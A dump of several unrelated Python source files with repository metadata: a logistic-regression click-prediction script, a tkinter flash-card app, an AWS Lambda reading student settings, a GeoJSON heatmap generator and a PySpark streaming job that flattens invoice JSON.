NAs\r\n# returns the sum of NA values column wise\r\nb = dataset_full.isnull().sum() \r\n\r\n# For Continuous vars: Impute with median\r\n# For Categorical vars: Impute with mode\r\n\r\nfor column in dataset_full:\r\n if( (dataset_full[column].dtype == 'object') & (b[column] > 0)):\r\n dataset_full[column].fillna(dataset_train[column].mode()[0], inplace = True)\r\n elif ((dataset_full[column].dtype != 'object') & (b[column] > 0)):\r\n dataset_full[column].fillna(dataset_train[column].median(), inplace = True)\r\n\r\nc = dataset_full.isnull().sum() \r\n\r\n\r\n\r\n###########################################\r\n## Outlier Detection & Correction \r\n########################################### \r\n\r\nfor column in dataset_train:\r\n if (dataset_train[column].dtype != 'object'):\r\n q = dataset_train[column].quantile(0.99)\r\n r = dataset_train[column].quantile(0.01)\r\n dataset_full[column] = np.where(dataset_full[column] > q, q, dataset_full[column])\r\n dataset_full[column] = np.where(dataset_full[column] < r, r, dataset_full[column])\r\n \r\n \r\n# Some columns still contain nulls after imputation (all-null in the full dataset or\r\n# in train), so we need to remove all those columns\r\nfor i in c.index:\r\n if(c[i]>0):\r\n dataset_full.drop(i, axis=1, inplace=True)\r\n \r\n \r\n# Dropping the session_id and DateTime key fields as they are just identifiers and do not add any value to the analysis\r\ndataset_full.drop(['session_id','DateTime'], axis=1, inplace=True)\r\n\r\n\r\n\r\n
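# NOTE (added): the loop below collapses rare categories - for every categorical column\r\n# it cross-tabulates category vs. is_click, and any category whose click rate is exactly\r\n# 0 (or exactly 1) is merged into a single \"<column>_0\" (or \"<column>_1\") bucket,\r\n# shrinking the cardinality before dummy encoding.\r\n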
#####################################################################\r\n## Creating bins using pd.crosstabs and looking closely at the data\r\n##################################################################### \r\nfor column in dataset_full:\r\n if(dataset_full[column].dtype == 'object'):\r\n \r\n print('before >>>>> ',column,'::::',dataset_full[column].nunique())\r\n a = pd.crosstab(dataset_full[column], dataset_full['is_click'], normalize='index')\r\n\r\n temp_desc = a.index[a[0] == 0]\r\n dataset_full[column] = np.where(dataset_full[column].isin(temp_desc),column+\"_0\",dataset_full[column]) \r\n \r\n \r\n temp_desc = a.index[a[0] ==1] \r\n dataset_full[column] = np.where(dataset_full[column].isin(temp_desc),column+\"_1\",dataset_full[column]) \r\n\r\n print('after >>>>> ',column,'::::',dataset_full[column].nunique())\r\n \r\n \r\n###########################################################################\r\n# Dummy variable creation\r\n# From the step above we know that no further category rationalization is\r\n# needed, so we can move directly to dummy creation\r\n########################################################################### \r\n \r\n# Create dummy variables from all indep categorical variables\r\n\r\n# Step 1: Identify categorical vars\r\nCateg_Vars = dataset_full.loc[:,dataset_full.dtypes == object].columns\r\n\r\n# Step 2: Create dummy vars\r\nDummy_Df = pd.get_dummies(dataset_full[Categ_Vars].drop(['source'], axis = 1), drop_first=True, dtype=int)\r\nDummy_Df.columns\r\nDummy_Df.shape\r\nDummy_Df.dtypes\r\n\r\n# Step 3: Append the Dummy_Df with dataset_full. Call it dataset_full2\r\ndataset_full2 = pd.concat([dataset_full, Dummy_Df], axis = 1)\r\ndataset_full2.shape\r\ndataset_full2.dtypes\r\n\r\n# Step 4.1: Drop all the irrelevant and categorical columns (Do NOT drop Source column - We need it for sample splitting)\r\nCols_To_Drop = Categ_Vars.drop('source') # Ensure you discard 'Source' column from \"columns to drop\"\r\n\r\n# Step 4.2\r\ndataset_full2.drop(Cols_To_Drop, axis=1, inplace=True)\r\ndataset_full2.shape\r\ndataset_full2.columns\r\n\r\n\r\n########################\r\n# Sampling\r\n########################\r\n\r\n# The 'Intercept' column is a constant 1; statsmodels multiplies it by its fitted\r\n# coefficient, so adding it explicitly keeps the model easy to explain\r\ndataset_full2['Intercept'] = 1\r\n\r\n# Divide the data into Train and Test based on Source column and \r\n# make sure you drop the source column\r\nTrain = dataset_full2.loc[dataset_full2.source == \"Train\",:].drop('source', axis = 1).copy()\r\nTrain.shape\r\nTest = dataset_full2.loc[dataset_full2.source == \"Test\",:].drop('source', axis = 1).copy()\r\nTest.shape\r\n\r\n#####################################################\r\n# Divide data into Train_X, Train_Y & Test_X, Test_Y\r\n#####################################################\r\n\r\n# Divide each dataset into Indep Vars and Dep var\r\nTrain_X = Train.drop('is_click', axis = 1).copy()\r\nTrain_Y = Train['is_click'].copy()\r\nTest_X = Test.drop('is_click', axis = 1).copy()\r\nTest_Y = Test['is_click'].copy()\r\n\r\n\r\n########################\r\n# Multicollinearity check\r\n########################\r\n\r\n# Check for VIF\r\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\r\n\r\n\r\ncols_to_drop_vif = []\r\n# All columns with vif value > 10 were earmarked to be dropped from analysis\r\nfor i in range(Train_X.shape[1]-1): # the -1 appears to skip the last column ('Intercept') from the VIF check\r\n temp_vif = variance_inflation_factor(Train_X.values, i) # Pass Train_X.values and i (col_number)\r\n print(Train_X.columns[i], \": \", temp_vif)\r\n if(temp_vif>10):\r\n print('Since vif value is greater than 10 so dropping the column ',Train_X.columns[i])\r\n cols_to_drop_vif.append(Train_X.columns[i])\r\n \r\nTrain_X.drop(cols_to_drop_vif, axis=1, inplace=True)\r\nTest_X.drop(cols_to_drop_vif, axis=1, inplace=True)\r\n\r\n\r\n
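# NOTE (added): rule of thumb behind the cutoff - VIF_i = 1/(1 - R_i^2), where R_i^2\r\n# comes from regressing column i on the remaining predictors, so VIF > 10 means roughly\r\n# 90% of a column's variance is explained by the other columns.\r\n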
########################\r\n# Model building\r\n########################\r\n\r\n# Build logistic regression model (using statsmodels package/library)\r\nimport statsmodels.api as sm\r\nM1 = sm.Logit(Train_Y, Train_X) # (Dep_Var, Indep_Vars) # This is model definition\r\nM1_Model = M1.fit() # This is model building\r\nM1_Model.summary() # This is model output summary\r\n\r\n#################################################\r\n# Manual model selection. \r\n# Drop the most insignificant variable in model \r\n# one by one and recreate the model\r\n# variable with p-score>0.05 is insignificant\r\n################################################\r\n\r\n# Drop city_development_index as its p-score is highest\r\nCols_To_Drop = ['city_development_index']\r\nM2 = sm.Logit(Train_Y, Train_X.drop(Cols_To_Drop, axis = 1)) # (Dep_Var, Indep_Vars)\r\nM2_Model = M2.fit()\r\nM2_Model.summary()\r\n# All remaining variables are significant after this step, so the commented\r\n# steps below are not required\r\n\r\n#\r\n## Drop product_B as its p-score is highest\r\n#Cols_To_Drop.append('product_B')\r\n#M3 = sm.Logit(Train_Y, Train_X.drop(Cols_To_Drop, axis = 1)) # (Dep_Var, Indep_Vars)\r\n#M3_Model = M3.fit()\r\n#M3_Model.summary()\r\n#\r\n#\r\n## Drop user_depth as its p-score is highest\r\n#Cols_To_Drop.append('user_depth')\r\n#M4 = sm.Logit(Train_Y, Train_X.drop(Cols_To_Drop, axis = 1)) # (Dep_Var, Indep_Vars)\r\n#M4_Model = M4.fit()\r\n#M4_Model.summary()\r\n\r\n\r\n########################\r\n# Predict on testset from train data\r\n########################\r\n\r\nColumns_To_Use = Train_X.drop(Cols_To_Drop, axis = 1).columns # Identify important columns from modeling\r\nTest['Test_Prob'] = M2_Model.predict(Test[Columns_To_Use]) # Use Test to store the predicted probs\r\nTest.head()\r\n\r\n\r\n# Classify 0 or 1 based on a probability cutoff. The code uses 0.065 here rather than\r\n# the conventional 0.5 for a binary classifier - see the accuracy sweep over cutoffs below.\r\nimport numpy as np\r\nTest['Test_Class'] = np.where(Test.Test_Prob >= 0.065, 1, 0)\r\nTest.columns\r\n\r\n# Confusion matrix\r\nConfusion_Mat = pd.crosstab(Test.Test_Class, Test.is_click) # R, C format\r\nConfusion_Mat\r\n\r\nConfusion_Mat[0]\r\nConfusion_Mat[0][0]\r\n\r\n# Check the accuracy of the model\r\n((Confusion_Mat[0][0] + Confusion_Mat[1][1])/Test.shape[0])*100\r\n## accuracy = 50.07% with cutoff of 0.065\r\n## accuracy = 85.54% with cutoff of 0.09\r\n## accuracy = 92.46% with cutoff of 0.10\r\n## accuracy = 93.04% with cutoff of 0.11\r\n## accuracy = 93.16% with cutoff of 0.12\r\n## Since we get maximum accuracy and fairly good AUC with cutoff 0.12 we will choose this cutoff\r\n\r\n#############################\r\n### Applying K-Fold Cross Validation\r\n#############################\r\n#from sklearn.model_selection import cross_val_score\r\n#accuracies = cross_val_score(estimator = M2, X = Train_X , y = Train_Y, cv = 10, n_jobs = -1)\r\n#\r\n#accuracies.mean()\r\n\r\n## cross_val_score needs a scikit-learn estimator, so it cannot wrap this statsmodels Logit model directly\r\n\r\n########################\r\n# AUC and ROC Curve\r\n########################\r\n\r\nfrom sklearn.metrics import roc_curve, auc\r\n\r\n# Predict on train data\r\nTrain['Train_Prob'] = M2_Model.predict(Train[Columns_To_Use])\r\n\r\n\r\n# Calculate FPR, TPR and Cutoff Thresholds\r\nfpr, tpr, thresholds = roc_curve(Train['is_click'], Train['Train_Prob'])\r\n\r\n\r\n# Build the ROC table\r\nROC_Df = pd.DataFrame()\r\nROC_Df['FPR'] = fpr \r\nROC_Df['TPR'] = tpr\r\nROC_Df['Cutoff'] = thresholds\r\n\r\n# Plot ROC Curve\r\nimport matplotlib.pyplot as plt\r\nplt.plot(ROC_Df.FPR, ROC_Df.TPR) # (x,y)\r\n\r\n# Area under curve (AUC)\r\nauc(fpr, tpr)\r\n\r\n\r\n
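# NOTE (added): one principled way to pick the cutoff from this ROC table is Youden's J\r\n# statistic (maximise TPR - FPR), e.g.:\r\n# best_cutoff = ROC_Df.loc[(ROC_Df.TPR - ROC_Df.FPR).idxmax(), 'Cutoff']\r\n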
#############################\r\n# Predict on actual testset\r\n#############################\r\ntest_file = pd.read_csv('test.csv',sep = ',',low_memory=False)\r\n\r\ntest_final = pd.merge(test_file, df_feat3, how='left', left_on=['user_id'], right_on = ['user_id'])\r\n\r\n\r\n\r\n# Dropping the session_id and DateTime key fields as they are just identifiers and do not add any value to the analysis\r\ntest_final_1 = pd.DataFrame()\r\ntest_final_1['session_id'] = test_final['session_id']\r\ntest_final.drop(['session_id','DateTime'], axis=1, inplace=True)\r\n\r\n##************************\r\n##************************\r\n########################\r\n# Missing value imputation (NAs)\r\n########################\r\n\r\n# First check for NAs\r\n# returns the sum of NA values column wise\r\nb = test_final.isnull().sum() \r\n\r\n# For Continuous vars: Impute with median\r\n# For Categorical vars: Impute with mode\r\n\r\nfor column in test_final:\r\n if( (test_final[column].dtype == 'object') & (b[column] > 0)):\r\n test_final[column].fillna(test_final[column].mode()[0], inplace = True)\r\n elif ((test_final[column].dtype != 'object') & (b[column] > 0)):\r\n test_final[column].fillna(test_final[column].median(), inplace = True)\r\n\r\nc = test_final.isnull().sum() \r\n\r\n###########################################\r\n## Outlier Detection & Correction \r\n########################################### \r\n\r\nfor column in test_final:\r\n if (test_final[column].dtype != 'object'):\r\n q = test_final[column].quantile(0.99)\r\n r = test_final[column].quantile(0.01)\r\n test_final[column] = np.where(test_final[column] > q, q, test_final[column])\r\n test_final[column] = np.where(test_final[column] < r, r, test_final[column])\r\n \r\n \r\n# Some columns still contain nulls after imputation (all-null in the full dataset or\r\n# in train), so we need to remove all those columns\r\nfor i in c.index:\r\n if(c[i]>0):\r\n test_final.drop(i, axis=1, inplace=True)\r\n \r\n \r\n\r\n\r\n###########################################################################\r\n# Dummy variable creation\r\n# From the step above we know that no further category rationalization is\r\n# needed, so we can move directly to dummy creation\r\n########################################################################### \r\n \r\n# Create dummy variables from all indep categorical variables\r\n\r\n# Step 1: Identify categorical vars\r\nCateg_Vars = test_final.loc[:,test_final.dtypes == object].columns\r\n\r\n# Step 2: Create dummy vars\r\nDummy_Df = pd.get_dummies(test_final[Categ_Vars], drop_first=True, dtype=int)\r\nDummy_Df.columns\r\nDummy_Df.shape\r\nDummy_Df.dtypes\r\n\r\n
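# NOTE (added): pd.get_dummies on the test set can yield a different column set than on\r\n# train (categories missing or unseen). A safer pattern is to reindex to the training\r\n# design matrix, e.g.: test_final2 = test_final2.reindex(columns=Columns_To_Use, fill_value=0)\r\n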
# Step 3: Append the Dummy_Df with test_final. Call it test_final2\r\ntest_final2 = pd.concat([test_final, Dummy_Df], axis = 1)\r\ntest_final2.shape\r\ntest_final2.dtypes\r\n\r\n\r\n# Step 4.2\r\ntest_final2.drop(Categ_Vars, axis=1, inplace=True)\r\ntest_final2.shape\r\ntest_final2.columns\r\n\r\n########################\r\n# Sampling\r\n########################\r\n\r\n# The 'Intercept' column is a constant 1; statsmodels multiplies it by its fitted\r\n# coefficient, so adding it explicitly keeps the model easy to explain\r\ntest_final2['Intercept'] = 1\r\n##************************\r\n##************************\r\n\r\n\r\n\r\n\r\ntest_final2['Test_Prob'] = M2_Model.predict(test_final2[Columns_To_Use]) # store the predicted probs on test_final2\r\ntest_final2.head()\r\n\r\n# Classify 0 or 1 based on the same 0.065 probability cutoff chosen on the validation split above\r\nimport numpy as np\r\ntest_final2['is_click'] = np.where(test_final2.Test_Prob >= 0.065, 1, 0)\r\n\r\ntest_result = pd.concat([test_final_1['session_id'], test_final2['is_click']], axis = 1)\r\n\r\ntest_result.shape \r\n \r\ntest_result1 = pd.DataFrame()\r\n\r\ntest_result1 = pd.merge(test_file, test_result.drop_duplicates(), on='session_id', how = 'inner')\r\n\r\ntest_result1.shape\r\n\r\ntest_result1.to_csv('submission.csv', index=False)\r\n\r\n\r\n## After this step the R code below was used to clean the submission file, since it\r\n## contained more records than there are session ids\r\n#Working with external files\r\n#getwd() # to know the default working directory or folder for R\r\n#setwd(\"D:/Analytics_Vidhya_Research/AM_Expert_2018 Competition\")\r\n#getwd()\r\n#\r\n#Data1 <- read.csv(\"submission_r.csv\")\r\n#Data2 <- read.csv(\"test.csv\")\r\n#\r\n#library(sqldf)\r\n#Data3 <- sqldf(\"SELECT DISTINCT a.session_id ,count(1) FROM Data1 a group by session_id having count(1)>1\")\r\n#\r\n#Data4 <- sqldf(\"SELECT DISTINCT a.session_id ,is_click FROM Data1 a\r\n# where a.session_id in (select session_id from Data3) and is_click = 1 order by session_id, is_click\")\r\n#\r\n#Data5 <- sqldf(\"SELECT DISTINCT a.session_id ,is_click FROM Data1 a\r\n# where a.session_id in (select session_id from Data3) and is_click = 1 \r\n# union all\r\n# SELECT DISTINCT a.session_id ,is_click FROM Data1 a\r\n# where a.session_id not in (select session_id from Data3) \")\r\n#write.csv(Data5, file = \"MyData.csv\",row.names=FALSE)\r\n\r\n\r\n","repo_name":"drml007/mygithub","sub_path":"amexpert2018-master/amexpert2018-master/amex_final2.py","file_name":"amex_final2.py","file_ext":"py","file_size_in_byte":16250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3349454782","text":"# --------------------IMPORTING ALL MODULES-------------------- #\nimport tkinter\nfrom PIL import ImageTk, Image\nimport pandas\nimport random\n# --------------------DECLARING VARIABLES-------------------- #\ncard_front_tf = True\ndicty = {}\n\n# --------------------IMPORTING CSV-------------------- #\ntry:\n french_words = pandas.read_csv('data/data.csv', header=None, index_col=0, squeeze=True).to_dict()\nexcept FileNotFoundError:\n french_words = pandas.read_csv('data/french_words.csv', header=None, index_col=0, squeeze=True).to_dict()\nrandom_word = random.choice((list(french_words)))\n# --------------------DEFINING FUNCTIONS-------------------- #\n\n\ndef flip_card():\n global card_front_tf, french_words\n global random_word\n\n if card_front_tf:\n del 
french_words[random_word]\n random_word = random.choice((list(french_words)))\n canvas.create_image(300, 200, anchor=\"center\", image=card_back)\n card_front_tf = False\n canvas.create_text(300, 150, fill=\"white\", font=\"Times 20 italic\", text=\"French\")\n canvas.create_text(300, 200, fill=\"white\", font=\"Times 20 bold\", text=random_word)\n else:\n canvas.create_image(300, 200, anchor=\"center\", image=card_front)\n card_front_tf = True\n canvas.create_text(300, 150, fill=\"black\", font=\"Times 20 italic\", text=\"English\")\n canvas.create_text(300, 200, fill=\"black\", font=\"Times 20 bold\", text=french_words[random_word])\n\n\ndef timed_flip(tf):\n global dicty\n if not tf:\n dicty[random_word] = french_words[random_word]\n df = pandas.DataFrame(list(dicty.items()))\n df.to_csv(\"data/data.csv\", header=False, index=False)\n flip_card()\n window.after(3000, flip_card)\n\n\n\n# --------------------DECLARING ALL VARIABLES-------------------- #\nBACKGROUND_COLOR = \"#B1DDC6\"\n\n# --------------------CREATING WINDOW-------------------- #\nwindow = tkinter.Tk()\nwindow.configure(bg=BACKGROUND_COLOR, padx=0, pady=50)\nwindow.title(\"Flash Cards\")\n\n# -----setting icon----- #\nicon = tkinter.PhotoImage(file=\"icon.png\")\nwindow.iconphoto(False, icon)\n\n# --------------------CREATING ALL IMAGES-------------------- #\n\n# -----back of card----- #\ncard_back_img = Image.open(\"images/card_back.png\") # reference path\ncard_back_img = card_back_img.resize((500, 300), Image.ANTIALIAS) # resizing and anti-aliasing\ncard_back = ImageTk.PhotoImage(card_back_img) # turning into tkinter photo class\n\n# -----front of card----- #\ncard_front_img = Image.open(\"images/card_front.png\") # reference path\ncard_front_img = card_front_img.resize((500, 300), Image.ANTIALIAS) # resizing and anti-aliasing\ncard_front = ImageTk.PhotoImage(card_front_img) # turning into tkinter photo class\n\n# -----right button----- #\nright_button_img = Image.open(\"images/right.png\") # reference path\nright_button_img = right_button_img.resize((100, 100), Image.ANTIALIAS) # resizing and anti-aliasing\nright_button = ImageTk.PhotoImage(right_button_img) # turning into tkinter photo class\n\n# -----wrong button----- #\nwrong_button_img = Image.open(\"images/wrong.png\") # reference path\nwrong_button_img = wrong_button_img.resize((100, 100), Image.ANTIALIAS) # resizing and anti-aliasing\nwrong_button = ImageTk.PhotoImage(wrong_button_img) # turning into tkinter photo class\n\n# TODO: Make this DRY\n\n# --------------------CREATING CANVAS-------------------- #\ncanvas = tkinter.Canvas(width=600, height=400, bg=BACKGROUND_COLOR, highlightthickness=0) # setting canvas size\n\n# --------------------LAYING IMAGE ON CANVAS-------------------- #\ntimed_flip(True)\n\n# --------------------CREATING BUTTONS-------------------- #\nrb = tkinter.Button(image=right_button, highlightthickness=0, borderwidth=0, bd=0, bg=BACKGROUND_COLOR,\n command=lambda: timed_flip(True))\nwb = tkinter.Button(image=wrong_button, highlightthickness=0, borderwidth=0, bd=0, bg=BACKGROUND_COLOR,\n command=lambda: timed_flip(False))\n\n# --------------------LAYING OUT OBJECTS-------------------- #\ncanvas.grid(row=1, column=0, columnspan=2)\nrb.grid(row=2, column=0)\nwb.grid(row=2, column=1)\n\n# --------------------MAIN LOOP-------------------- #\ntkinter.mainloop()\n\n# --------------------END-------------------- 
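The four near-identical image blocks above (and the "# TODO: Make this DRY" note) can be collapsed into one loader. A small sketch, with one extra point worth knowing: Image.ANTIALIAS was removed in Pillow 10, and Image.LANCZOS is the same filter and available in all modern Pillow releases, so the helper uses it directly.

from PIL import Image, ImageTk

def load_scaled(path, size):
    # Open, resize with the Lanczos filter, and wrap for tkinter.
    img = Image.open(path).resize(size, Image.LANCZOS)
    return ImageTk.PhotoImage(img)

# e.g. card_back = load_scaled("images/card_back.png", (500, 300))
#      right_button = load_scaled("images/right.png", (100, 100))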
#\n","repo_name":"The-Briel-Deal/CSV_Flash_Card_Quizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18020833185","text":"from package.query_db import query\nfrom package.lambda_exception import LambdaException\n\ndef get_student_settings_handler(event, context):\n\n student_id = int(event['student_id'])\n student_id_param = [{'name' : 'student_id', 'value' : {'longValue' : student_id}}]\n\n student_sql = \"SELECT user_id FROM students WHERE student_id = :student_id\"\n try:\n existing_student = query(student_sql, student_id_param)['records']\n\n except Exception as e:\n raise LambdaException(\"500: Unable to confirm that student exists, \" + str(e))\n\n if len(existing_student) <= 0:\n raise LambdaException(\"404: Student does not exist\")\n \n\n response = {}\n error_messages = []\n\n users_sql = \"SELECT first_name, last_name, email, preferred_name, picture, bio, pronouns, gender, phone FROM users WHERE id = :student_id;\"\n user_data = []\n try:\n user_data = query(users_sql, student_id_param)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 16\")\n\n response['first_name'] = user_data[0]['stringValue']\n response['last_name'] = user_data[1]['stringValue']\n response['email'] = user_data[2]['stringValue']\n \n if 'stringValue' in user_data[3]:\n response['preferred_name'] = user_data[3]['stringValue']\n else:\n response['preferred_name'] = None\n \n if 'stringValue' in user_data[4]: \n response['picture'] = user_data[4]['stringValue']\n else:\n response['picture'] = None\n \n if 'stringValue' in user_data[5]: \n response['bio'] = user_data[5]['stringValue']\n else:\n response['bio'] = None\n \n if 'stringValue' in user_data[6]: \n response['pronouns'] = user_data[6]['stringValue']\n else:\n response['pronouns'] = None\n \n if 'stringValue' in user_data[7]: \n response['gender'] = user_data[7]['stringValue']\n else:\n response['pronouns'] = None\n \n if 'stringValue' in user_data[8]: \n response['phone'] = user_data[8]['stringValue']\n else:\n response['phone'] = None \n\n\n students_sql = \"SELECT grad_year, resume, grad_student FROM students WHERE student_id = :student_id;\"\n student_data = []\n try:\n student_data = query(students_sql, student_id_param)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 60\")\n\n if 'longValue' in student_data[0]: \n response['grad_year'] = student_data[0]['longValue']\n else:\n response['grad_year'] = None\n \n if 'stringValue' in student_data[1]:\n response['resume'] = student_data[1]['stringValue']\n else:\n response['resume'] = None\n \n if 'booleanValue' in student_data[2]:\n response['grad_student'] = student_data[2]['booleanValue']\n else:\n response['grad_student'] = None\n\n\n colleges_sql = \"SELECT college FROM college C, student_college SC WHERE SC.student_id = :student_id AND C.college_id = SC.college_id\" \n try:\n colleges_data = query(colleges_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 81\")\n\n colleges = []\n if len(colleges_data) > 0:\n for college in colleges_data:\n colleges.append(college[0]['stringValue'])\n response['college'] = colleges\n else:\n response['college'] = None\n\n\n links_sql = \"SELECT link_id FROM user_link WHERE user_id = :student_id\"\n student_link_ids = []\n try:\n 
student_link_ids = query(links_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 98\")\n\n if len(student_link_ids) > 0:\n student_link_ids = student_link_ids[0]\n link_ids = str(student_link_ids[0]['longValue'])\n for link_id in student_link_ids[1:]:\n link_ids += \" OR link_id\" + str(link_id['longValue'])\n\n student_links_sql = \"SELECT link_type FROM link WHERE link_id = \" + link_ids + \";\"\n print(student_links_sql)\n try:\n student_links = query(student_links_sql)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 111\")\n\n links = []\n for link in student_links:\n links.append(link['stringValue'])\n\n response['links'] = links\n\n\n majors_sql = \"SELECT major_id FROM student_majors WHERE student_id = :student_id;\"\n student_major_ids = []\n try:\n student_major_ids = query(majors_sql, student_id_param)['records']\n \n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 126\")\n\n if len(student_major_ids) > 0:\n student_major_ids = student_major_ids[0]\n major_ids = str(student_major_ids[0]['longValue'])\n for major_id in student_major_ids[1:]:\n major_ids += \" OR major_id = \" + str(major_id['longValue'])\n \n student_majors_sql = \"SELECT major FROM major WHERE major_id = \" + major_ids + \";\"\n try:\n student_majors = query(student_majors_sql)['records'][0] \n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 139\")\n\n majors = []\n for major in student_majors:\n majors.append(major['stringValue'])\n\n response['major'] = majors\n \n else:\n response['major'] = None\n\n\n minors_sql = \"SELECT minor_id FROM student_minors WHERE student_id = :student_id;\"\n student_minor_ids = []\n try:\n student_minor_ids = query(minors_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 157\")\n\n if len(student_minor_ids) > 0:\n student_minor_ids = student_minor_ids[0]\n minor_ids = str(student_minor_ids[0]['longValue'])\n for minor_id in student_minor_ids[1:]:\n minor_ids += \" OR minor_id = \" + str(minor_id['longValue'])\n \n student_minors_sql = \"SELECT minor FROM minor WHERE minor_id = \" + minor_ids + \";\"\n try:\n student_minors = query(student_minors_sql)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 170\")\n\n minors = []\n for minor in student_minors:\n minors.append(minor['stringValue'])\n\n response['minor'] = minors \n \n else:\n response['minor'] = None\n\n\n notification_sql = \"SELECT notification_type_id FROM notification_preferences WHERE user_id = :student_id;\"\n notification_type_ids = []\n try:\n notification_type_ids = query(notification_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 187\")\n\n if len(notification_type_ids) > 0:\n notification_type_ids = notification_type_ids[0]\n notification_ids = str(notification_type_ids[0]['longValue'])\n for notification_id in notification_type_ids[1:]:\n notification_ids += \" OR notification_type_id = \" + str(notification_id['longValue'])\n\n student_notification_pref_sql = \"SELECT notification_type_name FROM notification_type WHERE notification_type_id = \" + notification_ids + \";\"\n try:\n student_notification_prefs = query(student_notification_pref_sql)['records']\n\n except Exception as e:\n 
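Two observations on the id-list plumbing above. First, the links branch builds " OR link_id" + str(...), dropping the "= ", so the interpolated WHERE clause comes out as e.g. link_id5 and the query fails; the majors and minors branches spell it correctly. Second, each branch flattens records[0] and iterates its cells, which only picks up the first row when several ids come back, and an IN clause is simpler than chained ORs anyway. A hedged helper (the name and the IN-clause form are mine) covering both points, assuming the single-cell-per-row RDS Data API shape used throughout this file:

def id_filter(column, records):
    # records is the Data API shape: one single-cell row per id,
    # e.g. [[{'longValue': 1}], [{'longValue': 2}]]
    ids = ", ".join(str(row[0]['longValue']) for row in records)
    return column + " IN (" + ids + ")"

# e.g. "SELECT major FROM major WHERE " + id_filter("major_id", student_major_ids)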
error_messages.append(str(e) + \" get_student_settings.py, line 199\")\n\n    notification_prefs = []\n    for pref in student_notification_prefs:\n        notification_prefs.append(pref['stringValue'])\n\n    response['notification_preferences'] = notification_prefs\n\n\n\n    if len(error_messages) > 0:\n        response['statusCode'] = 500\n        response['errorMessage'] = error_messages\n        return response\n    else:\n        response['statusCode'] = 200\n        return response","repo_name":"cicscareers/320-S20-Track1","sub_path":"lambdas/get_student_settings.py","file_name":"get_student_settings.py","file_ext":"py","file_size_in_byte":8067,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"14365246917","text":"import pandas as pd\nfrom geojson import Point, Feature\nimport json\n\nfrom scripts.migrate_dataset import read_dataset_sheet_1\n\n# generating heatmap geojson from objects dataset\ndef gen_geojson():\n    df = read_dataset_sheet_1()\n    df = df[df['object_point_lat'].notna()]\n    features = []\n    for _, row in df.iterrows():\n        try:\n            new_point = Point((float(row['object_point_lng']), float(row['object_point_lat'])))\n            feature = Feature(geometry=new_point)\n            features.append(feature)\n        except Exception as e:\n            print('Error!!: ', e)\n\n    result = {\n        \"type\": \"FeatureCollection\",\n        \"crs\": { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\" } },\n        \"features\": features\n    }\n\n    return result\n\n# entry point\ndef main():\n    output = gen_geojson()\n    with open(\"export/heatmap.geojson\", \"w\") as outfile:\n        json.dump(output, outfile)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"techpotion/leaders2021-utils","sub_path":"scripts/objects_heatmap_geojson.py","file_name":"objects_heatmap_geojson.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27587202128","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import expr\nfrom streamProcessing.lib.logger import Log4j\n\n\nif __name__ == '__main__':\n    # nc -l -p 9999\n    spark = SparkSession.builder \\\n        .appName(\"Streaming Word Count\") \\\n        .master('local[*]') \\\n        .config(\"spark.streaming.stopGracefullyOnShutdown\", \"true\") \\\n        .config(\"spark.sql.streaming.schemaInference\", \"true\") \\\n        .getOrCreate()\n    logger = Log4j(spark)\n\n    # 1. Read from source: json data files\n    # All files in the input folder must have the same extension!!\n    # Always clean the input. If the cleanSource option is not possible on the micro-batches, create a job\n    # that cleans the input source daily\n    raw_df = spark.readStream.format(\"json\") \\\n        .option(\"host\", \"localhost\") \\\n        .option(\"path\", \"input\") \\\n        .option(\"maxFilesPerTrigger\", \"1\") \\\n        .option(\"cleanSource\", \"delete\") \\\n        .load()\n    #raw_df.printSchema()\n\n    explode_df = raw_df.selectExpr(\"InvoiceNumber\", \"CreatedTime\", \"StoreID\", \"PosID\",\n                                   \"CustomerType\", \"PaymentMethod\", \"DeliveryType\", \"DeliveryAddress.City\",\n                                   \"DeliveryAddress.State\", \"DeliveryAddress.PinCode\",\n                                   \"explode(InvoiceLineItems) as LineItem\")\n    #explode_df.printSchema()\n\n    # 2. 
Apply transformations\n flattened_df = explode_df \\\n .withColumn(\"ItemCode\", expr(\"LineItem.ItemCode\")) \\\n .withColumn(\"ItemDescription\", expr(\"LineItem.ItemDescription\")) \\\n .withColumn(\"ItemPrice\", expr(\"LineItem.ItemPrice\")) \\\n .withColumn(\"ItemQty\", expr(\"LineItem.ItemQty\")) \\\n .withColumn(\"TotalValue\", expr(\"LineItem.TotalValue\")) \\\n .drop(\"LineItem\")\n\n # 3. Write to the output source\n invoiceWriterQuery = flattened_df.writeStream \\\n .format(\"json\") \\\n .queryName(\"Flattened Invoice Writer\") \\\n .outputMode(\"append\") \\\n .option(\"path\", \"output\") \\\n .option(\"checkpointLocation\", \"chk-point-dir\") \\\n .trigger(processingTime=\"1 minute\") \\\n .start()\n\n logger.info(\"Flattened Invoice Writer started\")\n 